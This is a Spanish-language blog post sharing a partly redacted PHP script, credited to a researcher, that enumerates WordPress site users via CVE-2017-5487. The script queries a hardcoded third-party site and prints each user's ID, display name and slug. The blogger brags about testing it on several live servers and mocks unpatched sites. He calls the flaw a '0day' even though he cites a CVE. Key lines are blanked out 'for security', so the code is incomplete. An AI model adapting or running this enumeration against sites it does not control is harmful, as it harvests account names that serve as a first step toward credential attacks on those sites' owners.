www.x25.org.mx |
Como dice el nombre de este artículo, encontraron un nuevo bug de WORDPRESS en su código con el cual podemos enumerar todos los usuarios.
aquí les dejo el script que creo el investigador el cual encontró el bug.
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https:
//mateuslino.tk
El CVE relacionado a este es: CVE: CVE-2017-5487
y probando ese bug en varios servidores por ahi me encontre que si sirve yeaaaaaaa...
JAJAJJAA VEAN LA IMAGEN....... :p p´s deberían de actualizar jejejeje hasta al mejor cazador se le va la presa.
-----inicio------
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https:
//mateuslino.tk
header (
'Content-type: text/html; charset=UTF-8'
);
$url
=
"https://bucaneiras.org/"
;
$payload
=
"-----borrado-por seguridad-----:p"
;
$urli
=
---
borrado-por seguridad
------
(
$url
.
$payload
);
$json
= json_decode(
$urli
, true);
if
(
$json
){
echo
"*-------
borrado-por seguridad
------*\n"
;
foreach
(
$json
as
$users
){
echo
"[*] ID : |"
.
$users
[
'id'
] .
"|\n"
;
echo
"[*] Name: |"
.
$users
[
'name'
] .
"|\n"
;
echo
"[*] User :|"
.
$users
[
'slug'
] .
"|\n"
;
echo
"\n"
;
}
echo
"*-----
borrado-por seguridad
---*"
;}
else
{
echo
"[*] No user"
;}
?>
---fin de código------
Este artículo es solo demostrativo de lo que puede hacer una persona usando un exploit con 0day de un bug de wordpress :p y NADA DE DATOS FUERON MOSTRADOS NI COMPARTIDOS.
Pero demuestra los peligros de que las empresas de publicación de vulnerabilidades saquen exploits 0day y que caigan en manos de malandros, el alcance de esto es ilimitado ups.
Saludos
Rodolfo H. BAz
www.rodoflohbaz.net
No hay comentarios:
Publicar un comentario